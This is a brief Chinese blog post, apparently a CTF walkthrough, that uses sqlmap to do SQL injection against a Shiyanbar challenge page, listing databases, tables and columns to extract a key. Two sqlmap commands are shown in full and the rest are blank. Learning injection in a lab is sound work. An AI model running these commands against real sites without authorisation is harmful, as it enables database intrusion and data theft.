实验吧这个看起来有点简单!&渗透测试工具sqlmap基础教程

2023-08-23 10:23:52

下载sqlmap，拖到python安装文件夹下面，在桌面创建sqlmap的cmd快捷方式，都不赘述。

教程开始：

1.检测注入点是否可用

命令：

2.暴库：爆出该mysql里所有数据库的名称

命令：

结果：爆出有3个数据库

3.web当前使用的数据库

命令：sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db

结果：得到当前使用的数据库是my_db

4.列出数据库中的表

命令：sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables

结果：my_db中有两个表

5.列出表中字段

命令：

结果：thiskey表中只有一列，k0y

6.暴字段内容

命令：

结果：得到key

码农公寓